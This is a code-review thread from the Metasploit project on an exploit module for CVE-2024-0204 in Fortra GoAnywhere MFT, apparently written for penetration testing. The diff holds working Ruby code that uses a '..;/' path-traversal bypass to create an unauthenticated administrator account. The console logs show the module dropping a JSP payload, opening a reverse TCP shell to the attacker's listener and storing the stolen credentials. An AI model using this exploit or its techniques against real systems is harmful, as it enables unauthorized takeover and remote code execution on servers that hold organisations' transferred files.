modules/exploits/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204.rb

```diff
@@ -0,0 +1,349 @@
+    json_data = res.get_json_document
+
+    product = json_data.dig('data', 'product')
+
+    version = json_data.dig('data', 'version')
+
+    return CheckCode::Unknown('No version information in response') if product.nil? || version.nil?
+
+    # As per the Fortra advisory, the following version are affected:
+    # * Fortra GoAnywhere MFT 6.x from 6.0.1
+    # * Fortra GoAnywhere MFT 7.x before 7.4.1
+    # This seems to imply version 6.0.1 through to 7.4.0 (inclusive) are vulnerable.
+    if Rex::Version.new(version).between?(Rex::Version.new('6.0.1'), Rex::Version.new('7.4.0'))
+      return CheckCode::Appears("#{product} #{version}")
+    end
+
+    Exploit::CheckCode::Safe("#{product} #{version}")
+  end
+
+  def exploit
+    # CVE-2024-0204 allows an unauthenticated attacker to create a new administrator account on the target system. So
+    # we generate the username/password pair we want to use.
+    # Note: We cannot delete the administrator account that we create.
+    admin_username = Rex::Text.rand_text_alpha_lower(8)
+    admin_password = Rex::Text.rand_text_alphanumeric(16)
+
+    # By using a double dot path segment with a semicolon in it, we can bypass the servers attempts to block access to
+    # the /wizard/InitialAccountSetup.xhtml endpoint that allows new admin account creation. As we leverage a double
+    # dot path segment, we need a directory to navigate down from, there are many available on the target so we pick
+    # a random one that we know works.
+    path_segments = %w[styles fonts auth help]
+
+    path_segment = path_segments.sample
+
+    # This is CVE-2024-0204...
+    initialaccountsetup_endpoint = "/#{path_segment}/..;/wizard/InitialAccountSetup.xhtml"
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, initialaccountsetup_endpoint),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'javax.faces.ViewState' => get_viewstate(initialaccountsetup_endpoint),
+        'j_id_u:creteAdminGrid:username' => admin_username,
+        'j_id_u:creteAdminGrid:password' => admin_password,
+        'j_id_u:creteAdminGrid:password_hinput' => admin_password,
+        'j_id_u:creteAdminGrid:confirmPassword' => admin_password,
+        'j_id_u:creteAdminGrid:confirmPassword_hinput' => admin_password,
+        'j_id_u:creteAdminGrid:submitButton' => '',
+        'createAdminForm_SUBMIT' => 1
+      }
+    )
+
+    # The method com.linoma.ga.ui.admin.users.InitialAccountSetupForm.InitialAccountSetupForm.submit will call method
+    # loginNewAdminUser and update our current session, so we dont need to manually login.
+    unless res&.code == 302 && res.headers['Location'] == normalize_uri(target_uri.path, 'Dashboard.xhtml')
+      fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}")
+    end
+
+    print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")
```

Comment:
Would you mind adding these credentials to the crdentials database so they are stored?

Reply:
I added commit [b259c5d](https://github.com/rapid7/metasploit-framework/pull/18762/commits/b259c5d6a7706fa7785ac5d3e82fbf4a27afda58) to address this, works as follows when I tested it: 

```
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > show options

Module options (exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.100.1.30      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8001             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /goanywhere/     yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  eth0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format  cracked_password
----  ------  -------  ------  -------  -----  ------------  ----------  ----------------

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > check
[*] 10.100.1.30:8001 - The target appears to be vulnerable. GoAnywhere MFT 7.4.0
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > exploit

[*] Started reverse TCP handler on 10.100.1.10:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. GoAnywhere MFT 7.4.0
[*] Created account: arhzdfmu:KwHjI4HtYPJueyM8. Note: This account will not be deleted by the module.
[*] Automatic targeting, detected OS: Linux
[*] Automatic targeting, detected install path: /opt/HelpSystems/GoAnywhere
[*] Dropped payload: /opt/HelpSystems/GoAnywhere/adminroot/2xgr59m6.jsp
[+] Deleted /opt/HelpSystems/GoAnywhere/adminroot/2xgr59m6.jsp
[!] Tried to delete /opt/HelpSystems/GoAnywhere/userdata/documents/arhzdfmu/2xgr59m6.jsp, unknown result
[+] Deleted /opt/HelpSystems/GoAnywhere/userdata/documents/arhzdfmu/
[*] Command shell session 1 opened (10.100.1.10:4444 -> 10.100.1.30:42662) at 2024-02-01 19:49:34 +0000

id
uid=1002(gamft) gid=1002(gamft) groups=1002(gamft)
pwd
/opt/HelpSystems/GoAnywhere
exit
[*] 10.100.1.30 - Command shell session 1 closed.
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > creds
Credentials
===========

host         origin       service                                    public    private           realm  private_type  JtR Format  cracked_password
----         ------       -------                                    ------    -------           -----  ------------  ----------  ----------------
10.100.1.30  10.100.1.30  8001/tcp (GoAnywhere MFT Admin Interface)  arhzdfmu  KwHjI4HtYPJueyM8         Password                  

msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) >
```

I also ran the exploit with `msfconsole` and no database attached, and the exploit works as expected (and no credentials are stored).

I have not used the `Report` mixin before so would appreciate if this commit could be double checked to ensure I am using the credentials reporting correctly.

Reply:
Looks great Stephen, I tested the `store_credentials` method in isolation (thank you Spencer for that suggestion) just to be certain and everything is working as expected 👍 
```
msf6 exploit(multi/http/fortra_goanywhere_mft_rce_cve_2024_0204) > creds
Credentials
===========

host       origin     service                                    public   private      realm  private_type  JtR Format  cracked_password
----       ------     -------                                    ------   -------      -----  ------------  ----------  ----------------
127.0.0.1  127.0.0.1  8001/tcp (GoAnywhere MFT Admin Interface)  jheysel  SuperSecret         Password
```